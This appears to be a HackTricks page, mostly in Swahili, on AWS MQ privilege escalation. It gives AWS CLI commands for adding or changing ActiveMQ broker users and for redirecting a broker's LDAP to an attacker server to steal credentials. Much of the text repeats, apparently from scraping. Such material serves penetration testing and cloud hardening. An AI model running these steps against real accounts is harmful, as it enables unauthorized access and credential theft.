AWS - MQ Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

MQ

Kwa maelezo zaidi kuhusu MQ angalia:

AWS - MQ Enum

`mq:ListBrokers`, `mq:CreateUser`

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

`mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

`mq:ListBrokers`, `mq:UpdateBroker`

Ikiwa broker inatumia LDAP kwa ajili ya idhini na ActiveMQ. Inawezekana kubadilisha mipangilio ya seva ya LDAP inayotumika kuwa moja inayodhibitiwa na mshambuliaji. Kwa njia hii mshambuliaji ataweza kuiba nyaraka zote zinazotumwa kupitia LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ikiwa unaweza kwa namna fulani kupata akreditivu za asili zilizotumika na ActiveMQ unaweza kufanya MitM, kuiba akreditivu, kutumia hizo kwenye seva ya asili, na kutuma jibu (labda kwa kurudia tu akreditivu zilizibwa unaweza kufanya hivi).

Athari Zinazoweza Kutokea: Iba akreditivu za ActiveMQ

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - Mediapackage Privesc NextAWS - MSK Privesc

Last updated 8 days ago

Kwa maelezo zaidi kuhusu MQ angalia:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

mq:ListBrokers, mq:UpdateBroker

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Athari Zinazoweza Kutokea: Iba akreditivu za ActiveMQ

MQ

mq:ListBrokers, mq:CreateUser

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

mq:ListBrokers, mq:UpdateBroker

MQ

mq:ListBrokers, mq:CreateUser

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

mq:ListBrokers, mq:UpdateBroker

`mq:ListBrokers`, `mq:CreateUser`

`mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`

`mq:ListBrokers`, `mq:UpdateBroker`

`mq:ListBrokers`, `mq:CreateUser`

`mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`

`mq:ListBrokers`, `mq:UpdateBroker`